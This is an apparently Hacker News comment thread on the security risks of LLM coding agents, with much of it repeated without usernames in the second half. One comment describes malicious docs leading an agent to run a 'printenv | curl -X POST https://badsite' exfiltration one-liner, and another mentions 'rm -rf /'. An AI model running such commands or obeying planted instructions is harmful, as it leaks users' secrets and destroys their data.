> Refrain from using LLMs in high-risk or safety-critical scenarios.
> Restrict the execution, permissions, and levels of access, such as what files a given system could read and execute, for example.
> Trap inputs and outputs to the system, looking for potential attacks or leakage of sensitive data out of the system.
this, this, this, a thousand billion times this.
this isn’t new advice either. it’s been around for circa ten years at this point (possibly longer).
diggan · 2h ago
> might ok a code change they shouldn’t have
Is the argument that developers who are less experience/in a hurry, will just accept whatever they're handed? In that case, this would be as true for random people submitting malicious PRs that someone accepts without reading, even without an LLM involved at all? Seems like an odd thing to call a "security nightmare".
mywittyname · 5m ago
> Is the argument that developers who are less experience/in a hurry,
The CTO of my company has pushed multiple AI written PRs that had obvious breaks/edge cases, even after chastising other people for having done the same.
It's not an experience issue. It's a complacency issue. It's a testing issue. It's the price companies pay to get products out the door as quickly as possible.
flail · 2h ago
One thing relying on coding agents does is it changes the nature of the work from typing-heavy (unless you count prompting) to code-review-heavy.
Cognitively, these are fairly distinct tasks. When creating code, we imagine architecture, tech solutions, specific ways of implementing, etc., pre-task. When reviewing code, we're given all these.
Sure, some of that thinking would go into prompting, but not to such a detail as when coding.
What follows is that it's easier to make a vulnerability pass through. More so, given that we're potentially exposed to more of them. After all, no one coding manually would consciously add vulnerability to their code base. Ultimately, all such cases are by omission.
A compromised coding agent would try that. So, we have to change the lenses from "vulnerability by omission only" to "all sorts of malicious active changes" too.
An entirely separate discussion is who reviews the code and what security knowledge they have. It's easy to dismiss the concern once a developer has been dealing with security for years. But these are not the only developers who use coding agents.
SamuelAdams · 2h ago
I was also confused. In our organization all PR’s must always be reviewed by a knowledgeable human. It does not matter if it was all LLM generated or written by a person.
If insecure code makes it past that then there are bigger issues - why did no one catch this, is the team understanding the tech stack well enough, and did security scanning / tooling fall short, and if so how can that be improved?
hgomersall · 53m ago
Well LLMs are designed to produce code that looks right, which arguably makes the code review process much harder.
avbanks · 23m ago
This is such an overlooked aspect of coding agents, the code review process is significantly harder now because bug/vulnerabilities are being hidden under plausible looking code.
reilly3000 · 2h ago
The attack isn’t bad code. It could be malicious docs that tell the LLM to make a tool call to printenv | curl -X POST https://badsite -d -
and steal your keys.
IanCal · 2h ago
Aside from noting that reviews are not perfect and increased attacks is a risk anyway - the other major risk is running code on your dev machine. You may think to review this more for an unknown pr than an llm suggestion.
gherkinnn · 1h ago
Agents execute code locally and can be very enthusiastic. All it takes is bad access control and a --prod flag to wipe a production DB.
The nature of code reviews has changed too. Up until recently I could expect the PR to be mostly understood by the author. Now the code is littered with odd patterns, making it almost adversarial.
Both can be minimised in a solid culture.
leeoniya · 50m ago
> I could expect the PR to be mostly understood by the author
i refuse to review PRs that are not 100% understood by the author. it is incredibly disrespectful to unload a bunch of LLM slop onto your peers to review.
if LLMs saved you time, it cannot be at the expense of my time.
Benjammer · 1h ago
This is the common refrain from the anti-AI crowd, they start by talking about an entire class of problems that already exist in humans-only software engineering, without any context or caveats. And then, when someone points out these problems exist with humans too, they move the goalposts and make it about the "volume" of code and how AI is taking us across some threshold where everything will fall apart.
The telling thing is they never mention this "threshold" in the first place, it's only a response to being called on the bullshit.
bpt3 · 1h ago
It's not bullshit. LLMs lower the bar for developers, and increase velocity.
Increasing the quantity of something that is already an issue without automation involved will cause more issues.
That's not moving the goalposts, it's pointing out something that should be obvious to someone with domain experience.
oxcabe · 38m ago
It'll get better over time. Or, at least, it should.
The biggest concern to me is that most public-facing LLM integrations follow product roadmaps that often focus in shipping more capable, more usable versions of the tool, instead of limiting the product scope based on the perceived maturity of the underlying technology.
There's a worrying amount of LLM-based services and agents in development by engineering teams that haven't still considered the massive threat surface they're exposing, mainly because a lot of them aren't even aware of how LLM security/safety testing even looks like.
Mizza · 21m ago
Until there's a paradigm shift and we get data and instructions in different bands, I don't see how it can get better over time.
It's like we've decided to build the foundation of the next ten years of technology in unescaped PHP. There are ways to make it work, but it's not the easiest path, and since the whole purpose of the AI initiative seems to be to promote developer laziness, I think there are bigger fuck-ups yet to come.
padolsey · 1h ago
Most of these attacks succeed because app developers either don’t trust role boundaries or don’t understand them. They assume the model can’t reliably separate trusted instructions (system/developer rules) from untrusted ones (user or retrieved data), so they flippantly pump arbitrary context into the system or developer role.
But alignment work has steadily improved role adherence; a tonne of RLHF work has gone into making sure roles are respected, like kernel vs. user space.
If role separation were treated seriously -- and seen as a vital and winnable benchmark (thus motivate AI labs to make it even tighter) many prompt injection vectors would collapse...
I don't know why these articles don't communicate this as a kind of central pillar.
Fwiw I wrote a while back about the “ROLP” — Role of Least Privilege — as a way to think about this, but the idea doesn't invigorate the senses I guess. So, even with better role adherence in newer models, entrenched developer patterns keep the door open. If they cared tho, the attack vectors would collapse.
jonfw · 54m ago
> If role separation were treated seriously -- and seen as a vital and winnable benchmark, many prompt injection vectors would collapse...
I think it will get harder and harder to do prompt injection over time as techniques to seperate user from system input mature and as models are trained on this strategy.
That being said, prompt injection attacks will also mature, and I don't think that the architecture of an LLM will allow us to eliminate the category of attack. All that we can do is mitigate
lylejantzi3rd · 1h ago
Is there a market for apps that use local LLMs? I don't know of many people who make their purchasing decisions based on security, but I do know lawyers are one subset that do.
Using a local LLM isn't a surefire solution unless you also restrict the app's permissions, but it's got to be better than using chatgpt.com. The question is: how much better?
flail · 1h ago
1. Organizations that care about controlling their data. Pretty much the same ones that were reluctant to embrace the cloud and kept their own server rooms.
An additional flavor to that: even if my professional AI agent license guarantees that my data won't be used to train generic models, etc., when a US court would make OpenAI reveal your data, they will, no matter where it is physically stored. That's kinda a loophole in law-making, as e.g., the EU increasingly requires data to be stored locally.
However, if one really wants control over the data, they might prefer to run everything in a local setup. Which is going to be way more complicated and expensive.
2. Small Language Models (SLMs). LLMs are generic. That's their whole point. No LLM-based solution needs all LLM's capabilities. And yet training and using the model, because of its sheer size, is expensive.
In the long run, it may be more viable to deploy and train one's own, much smaller model operating only on very specific training data. The tradeoff here is that you get a cheaper in use and more specialized tool, at the cost of up-front development and no easy way of upgrading a model when a new wave of LLMs is deployed.
rpicard · 1h ago
I’ve noticed a strong negative streak in the security community around LLMs. Lots of comments about how they’ll just generate more vulnerabilities, “junk code”, etc.
It seems very short sighted.
I think of it more like self driving cars. I expect the error rate to quickly become lower than humans.
Maybe in a couple of years we’ll consider it irresponsible not to write security and safety critical code with frontier LLMs.
xnorswap · 1h ago
I've been watching a twitch streamer vibe-code a game.
Very quickly he went straight to, "Fuck it, the LLM can execute anything, anywhere, anytime, full YOLO".
Part of that is his risk-appetite, but it's also partly because anything else is just really furstrating.
Someone who doesn't themselves code isn't going to understand what they're being asked to allow or deny anyway.
To the pure vibe-coder, who doesn't just not read the code, they couldn't read the code if they tried, there's no difference between "Can I execute grep -e foo */*.ts" and "Can I execute rm -rf /".
Both are meaningless to them. How do you communicate real risk? Asking vibe-coders to understand the commands isn't going to cut it.
So people just full allow all and pray.
That's a security nightmare, it's back to a default-allow permissive environment that we haven't really seen in mass-use, general purpose internet connected devices since windows 98.
The wider PC industry has got very good at UX to the point where most people don't need to worry themselves about how their computer works at all and still successfully hide most of the security trappings and keep it secure.
Meanwhile the AI/LLM side is so rough it basically forces the layperson to open a huge hole they don't understand to make it work.
voidUpdate · 1h ago
Yeah, it does sound a lot like self-driving cars. Everyone talks about how they're amazing and will do everything for you but you actually have to constantly hold their hand because they aren't as capable as they're made out to be
kriops · 1h ago
> I think of it more like self driving cars.
Analogous to the way I think of self-driving cars is the way I think of fusion: perpetually a few years away from a 'real' breakthrough.
There is currently no reason to believe that LLMs cannot acquire the ability to write secure code in the most prevalent use cases. However, this is contingent upon the availability of appropriate tooling, likely a Rust-like compiler. Furthermore, there's no reason to think that LLMs will become useful tools for validating the security of applications at either the model or implementation level—though they can be useful for detecting quick wins.
kingstnap · 1h ago
For now we train LLMs on next token prediction and Fill-in-the-middle for code. This exactly reflects in the experience of using them in that over time they produce more and more garbage.
It's optimistic but maybe once we start training them on "remove the middle" instead it could help make code better.
bpt3 · 1h ago
You're talking about a theoretical problem in the future, while I assure you vibe coding and agent based coding is causing major issues today.
Today, LLMs make development faster, not better.
And I'd be willing to bet a lot of money they won't be significantly better than a competent human in the next decade, let alone the next couple years. See self-driving cars as an example that supports my position, not yours.
anonzzzies · 1h ago
Does it matter though? Programming was already terrible. There are a few companies doing good things, the rest made garbage already for the past decades. No one cares (well; consumers don't care; companies just have insurance when it happens so they don't really care either; it's just a necessary line item) about their data being exposed etc as long as things are cheap cheap. People daily work with systems that are terrible in every way and then they get hacked (for ransom or not). Now we can just make things cheaper/faster and people will like it. Even at the current level software will be vastly easier and faster to make; sure it will suck, but I'm not sure anyone outside HN cares in any way shape or form (I know our clients don't; they are shipping garbage faster than ever and they see our service as a necessary business expense IF something breaks/messes up). Which means that it won't matter if LLMs get better; it matters that they get a lot cheaper so we can just run massive amounts of them on every device committing code 24/7 and that we keep up our tooling to find possible minefields faster and bandaid them until the next issue pops up.
furyofantares · 49m ago
> Today, LLMs make development faster, not better.
You don't have to use them this way. It's just extremely tempting and addictive.
You can choose to talk to them about code rather than features, using them to develop better code at a normal speed instead of worse code faster. But that's hard work.
SpicyLemonZest · 31m ago
Perhaps I'm doing something wrong, but I can't use them that way, hard work or no. It feels like trying to pair program with a half-distracted junior developer.
philipp-gayret · 1h ago
What metric would you measure to determine whether a fully AI-based flow is better than a competent human engineer? And how much would you like to bet?
bpt3 · 1h ago
In this context, fewer security vulnerabilities exist in a real world vibe coded application (not a demo or some sort of toy app) than one created by a subject matter expert without LLM agents.
I'd be willing to bet 6 figures that doesn't happen in the next 2 years.
anonzzzies · 1h ago
The current models cannot be made to become better than humans who are good at their job. Many are not good at their job though and I think (see) we already crossed that. Certain outsourcing countries could have (not yet, but will have) millions of people without jobs as they won't be able to steer the LLMs to making anything usable as they never understood anything to begin with.
For people here on HN I agree with you; not in the next 2 years or, if no-one invents another model than the transformer based model, not for any length of time until that happens.
bpt3 · 7m ago
Agreed. I think the parent poster meant it differently, but I think self driving cars are an excellent analogy.
They've been "on the cusp" of widespread adoption for around 10 years now, but in reality they appear to have hit a local optimum and another major advance is needed in fundamental research to move them towards mainstream usage.
tptacek · 1h ago
There are plenty of security people on the other side of this issue; they're just not making news, because the way you make news in security is by announcing vulnerabilities. By way of example, last I checked, Dave Aitel was at OpenAI.
croes · 1h ago
> Dave Aitel was at OpenAI.
Then he isn’t unbiased.
tptacek · 1h ago
Zzzzz. I don't think you're going to be able to No True Scotsman Dave Aitel out of security.
andrepd · 1h ago
Let's maybe cross that bridge when (more important, if!) we come to it then? We have no idea how LLMs are gonna evolve, but clearly now they are very much not ready for the job.
croes · 1h ago
It’s the same problem as with self driving cars.
Self driving cars maybe be better than the average driver but worse than the top drivers.
For security code it’s the same.
sneak · 3h ago
I have recently written security-sensitive code using Opus 4. I of course reviewed every line and made lots of both manual and prompt-based revisions.
Cloudflare apparently did something similar recently.
It is more than possible to write secure code with AI, just as it is more than possible to write secure code with inexperienced junior devs.
As for the RCE vector; Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.
Separately from AI, most people deploy containers based on tagged version names, not cryptographic hashes. This is trivially exploitable by the container registry.
We have learned nothing from Solarwinds.
senko · 2h ago
> Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.
Isn't that the same for Chrome, VSCode, and any upstream-managed (as opposed to distro/os managed) package channel with auto updates?
It's a bad default, but pretty much standard practice, and done in the name of security.
bpt3 · 1h ago
It sounds like you can create and release high quality software with or without an agent.
What would have happened if someone without your domain expertise wasn't reviewing every line and making the changes you mentioned?
People aren't concerned about you using agents, they're concerned about the second case I described.
senko · 3h ago
tldr: Gary Marcus Went To Black Hat - What He Saw There Will Shock You
(it won't if you've been following LLM coding space, but anyway...)
I hoped Gary would have at least linked to the talks so people could get the actual info without his lenses, but no such luck.
But he did link to The Post A Few Years Ago Where He Predicted It All.
(yes I'm cynical: the post is mostly on point, but by now I wouldn't trust Marcus if he announced People Breathe Oxygen).
flail · 1h ago
Save for Gary Marcus' ego, which you're right about, most of the article is written by Nathan Hamiel from Kudelski Security. The voice of the post sounds weird because Nathan is referred to in a third person, but from the content, it's pretty clear that much of that is not Gary Marcus.
Also, slides from the Nvidia talk, which they refer to a lot, are linked. The Nathan's presentation links only to the conference website.
popcorncowboy · 1h ago
The Gary Marcus Schtick at this point is to shit on LLM-anything, special extra poop if it's sama-anything. Great, I don't even disagree. But it's hard to read anything he puts up these days as he's become a caricature of the enlightened-LLM-hater to the extent that his work reads like auto-gen "whatever you said but the opposite, and also you suck, I'm Gary Marcus".
> Refrain from using LLMs in high-risk or safety-critical scenarios.
> Restrict the execution, permissions, and levels of access, such as what files a given system could read and execute, for example.
> Trap inputs and outputs to the system, looking for potential attacks or leakage of sensitive data out of the system.
this, this, this, a thousand billion times this.
this isn’t new advice either. it’s been around for circa ten years at this point (possibly longer).
Is the argument that developers who are less experience/in a hurry, will just accept whatever they're handed? In that case, this would be as true for random people submitting malicious PRs that someone accepts without reading, even without an LLM involved at all? Seems like an odd thing to call a "security nightmare".
The CTO of my company has pushed multiple AI written PRs that had obvious breaks/edge cases, even after chastising other people for having done the same.
It's not an experience issue. It's a complacency issue. It's a testing issue. It's the price companies pay to get products out the door as quickly as possible.
Cognitively, these are fairly distinct tasks. When creating code, we imagine architecture, tech solutions, specific ways of implementing, etc., pre-task. When reviewing code, we're given all these.
Sure, some of that thinking would go into prompting, but not to such a detail as when coding.
What follows is that it's easier to make a vulnerability pass through. More so, given that we're potentially exposed to more of them. After all, no one coding manually would consciously add vulnerability to their code base. Ultimately, all such cases are by omission.
A compromised coding agent would try that. So, we have to change the lenses from "vulnerability by omission only" to "all sorts of malicious active changes" too.
An entirely separate discussion is who reviews the code and what security knowledge they have. It's easy to dismiss the concern once a developer has been dealing with security for years. But these are not the only developers who use coding agents.
If insecure code makes it past that then there are bigger issues - why did no one catch this, is the team understanding the tech stack well enough, and did security scanning / tooling fall short, and if so how can that be improved?
The nature of code reviews has changed too. Up until recently I could expect the PR to be mostly understood by the author. Now the code is littered with odd patterns, making it almost adversarial.
Both can be minimised in a solid culture.
i refuse to review PRs that are not 100% understood by the author. it is incredibly disrespectful to unload a bunch of LLM slop onto your peers to review.
if LLMs saved you time, it cannot be at the expense of my time.
The telling thing is they never mention this "threshold" in the first place, it's only a response to being called on the bullshit.
Increasing the quantity of something that is already an issue without automation involved will cause more issues.
That's not moving the goalposts, it's pointing out something that should be obvious to someone with domain experience.
The biggest concern to me is that most public-facing LLM integrations follow product roadmaps that often focus in shipping more capable, more usable versions of the tool, instead of limiting the product scope based on the perceived maturity of the underlying technology.
There's a worrying amount of LLM-based services and agents in development by engineering teams that haven't still considered the massive threat surface they're exposing, mainly because a lot of them aren't even aware of how LLM security/safety testing even looks like.
It's like we've decided to build the foundation of the next ten years of technology in unescaped PHP. There are ways to make it work, but it's not the easiest path, and since the whole purpose of the AI initiative seems to be to promote developer laziness, I think there are bigger fuck-ups yet to come.
But alignment work has steadily improved role adherence; a tonne of RLHF work has gone into making sure roles are respected, like kernel vs. user space.
If role separation were treated seriously -- and seen as a vital and winnable benchmark (thus motivate AI labs to make it even tighter) many prompt injection vectors would collapse...
I don't know why these articles don't communicate this as a kind of central pillar.
Fwiw I wrote a while back about the “ROLP” — Role of Least Privilege — as a way to think about this, but the idea doesn't invigorate the senses I guess. So, even with better role adherence in newer models, entrenched developer patterns keep the door open. If they cared tho, the attack vectors would collapse.
I think it will get harder and harder to do prompt injection over time as techniques to seperate user from system input mature and as models are trained on this strategy.
That being said, prompt injection attacks will also mature, and I don't think that the architecture of an LLM will allow us to eliminate the category of attack. All that we can do is mitigate
Using a local LLM isn't a surefire solution unless you also restrict the app's permissions, but it's got to be better than using chatgpt.com. The question is: how much better?
An additional flavor to that: even if my professional AI agent license guarantees that my data won't be used to train generic models, etc., when a US court would make OpenAI reveal your data, they will, no matter where it is physically stored. That's kinda a loophole in law-making, as e.g., the EU increasingly requires data to be stored locally.
However, if one really wants control over the data, they might prefer to run everything in a local setup. Which is going to be way more complicated and expensive.
2. Small Language Models (SLMs). LLMs are generic. That's their whole point. No LLM-based solution needs all LLM's capabilities. And yet training and using the model, because of its sheer size, is expensive.
In the long run, it may be more viable to deploy and train one's own, much smaller model operating only on very specific training data. The tradeoff here is that you get a cheaper in use and more specialized tool, at the cost of up-front development and no easy way of upgrading a model when a new wave of LLMs is deployed.
It seems very short sighted.
I think of it more like self driving cars. I expect the error rate to quickly become lower than humans.
Maybe in a couple of years we’ll consider it irresponsible not to write security and safety critical code with frontier LLMs.
Very quickly he went straight to, "Fuck it, the LLM can execute anything, anywhere, anytime, full YOLO".
Part of that is his risk-appetite, but it's also partly because anything else is just really furstrating.
Someone who doesn't themselves code isn't going to understand what they're being asked to allow or deny anyway.
To the pure vibe-coder, who doesn't just not read the code, they couldn't read the code if they tried, there's no difference between "Can I execute grep -e foo */*.ts" and "Can I execute rm -rf /".
Both are meaningless to them. How do you communicate real risk? Asking vibe-coders to understand the commands isn't going to cut it.
So people just full allow all and pray.
That's a security nightmare, it's back to a default-allow permissive environment that we haven't really seen in mass-use, general purpose internet connected devices since windows 98.
The wider PC industry has got very good at UX to the point where most people don't need to worry themselves about how their computer works at all and still successfully hide most of the security trappings and keep it secure.
Meanwhile the AI/LLM side is so rough it basically forces the layperson to open a huge hole they don't understand to make it work.
Analogous to the way I think of self-driving cars is the way I think of fusion: perpetually a few years away from a 'real' breakthrough.
There is currently no reason to believe that LLMs cannot acquire the ability to write secure code in the most prevalent use cases. However, this is contingent upon the availability of appropriate tooling, likely a Rust-like compiler. Furthermore, there's no reason to think that LLMs will become useful tools for validating the security of applications at either the model or implementation level—though they can be useful for detecting quick wins.
It's optimistic but maybe once we start training them on "remove the middle" instead it could help make code better.
Today, LLMs make development faster, not better.
And I'd be willing to bet a lot of money they won't be significantly better than a competent human in the next decade, let alone the next couple years. See self-driving cars as an example that supports my position, not yours.
You don't have to use them this way. It's just extremely tempting and addictive.
You can choose to talk to them about code rather than features, using them to develop better code at a normal speed instead of worse code faster. But that's hard work.
I'd be willing to bet 6 figures that doesn't happen in the next 2 years.
For people here on HN I agree with you; not in the next 2 years or, if no-one invents another model than the transformer based model, not for any length of time until that happens.
They've been "on the cusp" of widespread adoption for around 10 years now, but in reality they appear to have hit a local optimum and another major advance is needed in fundamental research to move them towards mainstream usage.
Then he isn’t unbiased.
Self driving cars maybe be better than the average driver but worse than the top drivers.
For security code it’s the same.
Cloudflare apparently did something similar recently.
It is more than possible to write secure code with AI, just as it is more than possible to write secure code with inexperienced junior devs.
As for the RCE vector; Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.
Separately from AI, most people deploy containers based on tagged version names, not cryptographic hashes. This is trivially exploitable by the container registry.
We have learned nothing from Solarwinds.
Isn't that the same for Chrome, VSCode, and any upstream-managed (as opposed to distro/os managed) package channel with auto updates?
It's a bad default, but pretty much standard practice, and done in the name of security.
What would have happened if someone without your domain expertise wasn't reviewing every line and making the changes you mentioned?
People aren't concerned about you using agents, they're concerned about the second case I described.
(it won't if you've been following LLM coding space, but anyway...)
I hoped Gary would have at least linked to the talks so people could get the actual info without his lenses, but no such luck.
But he did link to The Post A Few Years Ago Where He Predicted It All.
(yes I'm cynical: the post is mostly on point, but by now I wouldn't trust Marcus if he announced People Breathe Oxygen).
Also, slides from the Nvidia talk, which they refer to a lot, are linked. The Nathan's presentation links only to the conference website.